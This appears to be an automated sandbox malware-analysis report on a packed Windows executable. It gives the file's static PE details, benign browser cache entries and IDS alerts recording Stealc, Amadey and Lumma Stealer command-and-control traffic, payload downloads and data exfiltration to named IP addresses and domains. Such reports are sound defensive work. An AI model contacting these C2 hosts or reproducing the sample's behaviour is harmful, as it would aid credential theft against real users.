Preview:	<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

Chrome Cache Entry: 603

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (46884)
Category:	downloaded
Size (bytes):	1817110
Entropy (8bit):	5.501019337872714
Encrypted:	false
SSDEEP:	24576:w9NP9HVx3Yk4SB1DkCXWDlWn4EG72mht/e:wtHVx3Yk4SB1DkCXWDlW4EG72Ctm
MD5:	6344957212789863FA4B39721DAAFB40
SHA1:	5E496B5667B449507C1286741659964C74EEF639
SHA-256:	65411595AC128F02A7F850EF501D44958CC8B505A1C5B224773BCE4D36EFA5C5
SHA-512:	8287F99B9E0A7E67219C384DD4C97970BE1762E345E2665E0D397E04C60C414392DA6005CF2082B902D65433F48313900E5440FC51CEC8C40727637D242C25EE
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.028696169/scripts/en-us/index-docs.js
Preview:	"use strict";(()=>{var hve=Object.create;var bT=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?bT(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t\|\|e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"\|\|typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&bT(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))\|\|n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t\|\|!e\|\|!e.__esModule?bT(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))\|\|r);return n&&r&&bT(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),vR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(vR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(

Chrome Cache Entry: 604

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (33019), with no line terminators
Category:	downloaded
Size (bytes):	33019
Entropy (8bit):	4.916265462750225
Encrypted:	false
SSDEEP:	384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUcF:5hOEO8chkMet7pCjBfcHkWOzUcF
MD5:	17339002B4DE90FC5EA0710CA49160CA
SHA1:	AE771FFC398F8FA8C934FF05A9EBD6CB6D14BA9C
SHA-256:	D81C792435B93CBAA9A54F59D538121D2EE33B4446359A31D3998D769341F555
SHA-512:	15127FD515FD2CD55634EEDA71C4F2C96980E6FC51D169771484169104924A176D9387D792D08C7623AC3A44BCF9A00D2DADD6040417892ADB4A542C47B18F2C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/toc.json
Preview:	{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

Chrome Cache Entry: 605

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	35005
Entropy (8bit):	7.980061050467981
Encrypted:	false
SSDEEP:	768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:	522037F008E03C9448AE0AAAF09E93CB
SHA1:	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:	643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:	false
Preview:	.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.\|.n..]..m..`W..W.H.~..\|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y\|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il\|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......\|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

Chrome Cache Entry: 606

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13842
Entropy (8bit):	7.802399161550213
Encrypted:	false
SSDEEP:	192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
MD5:	F6EC97C43480D41695065AD55A97B382
SHA1:	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
SHA-256:	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
SHA-512:	22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
Malicious:	false
Preview:	.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo\|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo\|.Mh.km..A.k..k....n.C`\|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

Chrome Cache Entry: 607

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	4897
Entropy (8bit):	4.794639101874543
Encrypted:	false
SSDEEP:	96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzVqrpCvJ4QG63JjJ+do88HxbqP:dgQ+KfZcbhaWjp45qtAdflfDOFnNgBy4
MD5:	84E6C95F0E5378BDA94FA965C4692FAF
SHA1:	7C1D6572906509B08F8CD7B7A33EB9F9697EE6D1
SHA-256:	88A4A7B4F1160F8CAD3EB835116C29AC39659D586D4DADC54D9E40AC7E1BC610
SHA-512:	D34BFF37F8402B4A1FEE3C26F247A86D72666647A10E83D711A1BED1D24C6FC13674D65DCC037C22811B227FEC34B5DE20442191A42F9D78FC79D55FD5792761
Malicious:	false
Preview:	{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

Chrome Cache Entry: 608

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	1478
Entropy (8bit):	5.030941252322257
Encrypted:	false
SSDEEP:	24:TGAg3Efef6tfTf/fffCfxfdffW4N5f0f8fK8zyRWmmkYRWDKslbzP3LTPv4NUhqI:TK0W6bXnq512ysUbkfKCvUjeGxbu
MD5:	020629EBA820F2E09D8CDA1A753C032B
SHA1:	D91A65036E4C36B07AE3641E32F23F8DD616BD17
SHA-256:	F8AE8A1DC7CE7877B9FB9299183D2EBB3BEFAD0B6489AE785D99047EC2EB92D1
SHA-512:	EF5A5C7A301DE55D103B1BE375D988970D9C4ECD62CE464F730C49E622128F431761D641E1DFAA32CA03F8280B435AE909486806DF62A538B48337725EB63CE1
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.028696169/global/deprecation.js
Preview:	// ES5 script for back compat with unsupported browsers...!(function () {...'use strict';...// Keep in sync with environment/browser.ts...var supportedBrowser =....typeof Blob === 'function' &&....typeof PerformanceObserver === 'function' &&....typeof Intl === 'object' &&....typeof MutationObserver === 'function' &&....typeof URLSearchParams === 'function' &&....typeof WebSocket === 'function' &&....typeof IntersectionObserver === 'function' &&....typeof queueMicrotask === 'function' &&....typeof TextEncoder === 'function' &&....typeof TextDecoder === 'function' &&....typeof customElements === 'object' &&....typeof HTMLDetailsElement === 'function' &&....typeof AbortController === 'function' &&....typeof AbortSignal === 'function' &&....'entries' in FormData.prototype &&....'toggleAttribute' in Element.prototype &&....'replaceChildren' in Element.prototype &&....// ES2019....'fromEntries' in Object &&....'flatMap' in Array.prototype &&....'trimEnd' in String.prototype &&....// ES2020..

Chrome Cache Entry: 609

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	3130
Entropy (8bit):	4.790069981348324
Encrypted:	false
SSDEEP:	48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
MD5:	EBA6E81304F2F555E1D2EA3126A18A41
SHA1:	61429C3FE837FD4DD68E7B26678F131F2E00070D
SHA-256:	F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
SHA-512:	3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
Preview:	{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

Chrome Cache Entry: 610

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18367
Entropy (8bit):	7.7772261735974215
Encrypted:	false
SSDEEP:	384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:	240C4CC15D9FD65405BB642AB81BE615
SHA1:	5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:	267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! ....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?\|..H+Dd.....Y%....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.943218173874822
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'769'472 bytes
MD5:	38f7509d769058697f81ef17cfbe8c87
SHA1:	38e2634c714fccf57ea1d5b27188f2c77f86e2db
SHA256:	daf5ec940fde5a1df665a7240a0e27d3c39da5b62d4d1935579158fa2a095b00
SHA512:	06e70d5f8cb7bb447a8d6a0e961186cf2928a06cbbdc0ac5a4e5845e896f8e104752bc64ee089bd7cef6be20dc1c3f655fa07beeb0b81cc47e606bb47cd5bf9f
SSDEEP:	49152:2qeXRL9h088NVvIYmSe9Mzeuo20b8pjNIGDuP:XEL30zNVbjDzeuoYjZDu
TLSH:	9B8533BF9CA630BDD8EC793020A6DE6BEBB114FF4C5176217C91497C1813E98960A1F9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xa81000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F8FA0C796FAh
pmaxub mm3, qword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24b04d	0x61	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24b1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x249000	0x16200	33d4b96ce137d638f5913babcf3b8d5a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x24a000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x24b000	0x1000	0x200	0d0399d83a742d5d86c5718841e8e842	False	0.134765625	data	0.8646718654202081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x24c000	0x29d000	0x200	f1e1f51930df4df60c604b9d06b36923	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vzzebkzr	0x4e9000	0x197000	0x196200	4906c33d254483db01a8549b5c4d9c44	False	0.9945674390196984	data	7.952500724372932	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ojovyesw	0x680000	0x1000	0x600	07b3e4cc827457931a448f372147bcaf	False	0.5807291666666666	data	4.958818501093828	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x681000	0x3000	0x2200	d3f9ad018d950578e23b3a2c33654833	False	0.06732536764705882	DOS executable (COM)	0.7640151796149172	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-10T04:54:59.307490+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-10T04:54:59.589220+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-10T04:54:59.595642+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.5	49704	TCP
2024-11-10T04:54:59.871782+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-10T04:54:59.882206+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.5	49704	TCP
2024-11-10T04:55:01.065999+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-10T04:55:01.620388+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-10T04:55:14.499625+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.5	49730	TCP
2024-11-10T04:55:22.374858+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49771	185.215.113.206	80	TCP
2024-11-10T04:55:23.722191+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49771	185.215.113.206	80	TCP
2024-11-10T04:55:24.407672+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49771	185.215.113.206	80	TCP
2024-11-10T04:55:24.990948+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49771	185.215.113.206	80	TCP
2024-11-10T04:55:26.639288+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49771	185.215.113.206	80	TCP
2024-11-10T04:55:27.165061+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49771	185.215.113.206	80	TCP
2024-11-10T04:55:31.346199+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49905	185.215.113.16	80	TCP
2024-11-10T04:55:56.859150+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.5	50056	TCP
2024-11-10T04:56:04.556830+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.5	50104	185.215.113.43	80	TCP
2024-11-10T04:56:07.905452+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50122	185.215.113.16	80	TCP
2024-11-10T04:56:07.905452+0100	2047626	ET MALWARE Win32/Amadey Payload Request (GET) M1	1	192.168.2.5	50122	185.215.113.16	80	TCP
2024-11-10T04:56:09.999882+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.5	50116	TCP
2024-11-10T04:56:10.922911+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50124	185.215.113.43	80	TCP
2024-11-10T04:56:11.876005+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50125	185.215.113.16	80	TCP
2024-11-10T04:56:14.893255+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50127	185.215.113.43	80	TCP
2024-11-10T04:56:15.824656+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50128	185.215.113.16	80	TCP
2024-11-10T04:56:20.735482+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.5	54209	1.1.1.1	53	UDP
2024-11-10T04:56:20.760506+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.5	64943	1.1.1.1	53	UDP
2024-11-10T04:56:20.786747+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.5	57799	1.1.1.1	53	UDP
2024-11-10T04:56:20.810027+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.5	65272	1.1.1.1	53	UDP
2024-11-10T04:56:20.838300+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.5	60590	1.1.1.1	53	UDP
2024-11-10T04:56:20.866455+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.5	62063	1.1.1.1	53	UDP
2024-11-10T04:56:20.893111+0100	2057119	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store)	1	192.168.2.5	63559	1.1.1.1	53	UDP
2024-11-10T04:56:21.154985+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50134	185.215.113.43	80	TCP
2024-11-10T04:56:21.551602+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50135	188.114.97.3	443	TCP
2024-11-10T04:56:21.551602+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50135	188.114.97.3	443	TCP
2024-11-10T04:56:22.086716+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50136	185.215.113.16	80	TCP
2024-11-10T04:56:22.813668+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50135	188.114.97.3	443	TCP
2024-11-10T04:56:22.813668+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50135	188.114.97.3	443	TCP
2024-11-10T04:56:23.468839+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50139	188.114.97.3	443	TCP
2024-11-10T04:56:23.468839+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50139	188.114.97.3	443	TCP
2024-11-10T04:56:24.095212+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50139	188.114.97.3	443	TCP
2024-11-10T04:56:24.095212+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50139	188.114.97.3	443	TCP
2024-11-10T04:56:25.008382+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50140	188.114.97.3	443	TCP
2024-11-10T04:56:25.008382+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50140	188.114.97.3	443	TCP
2024-11-10T04:56:26.563142+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50141	188.114.97.3	443	TCP
2024-11-10T04:56:26.563142+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50141	188.114.97.3	443	TCP
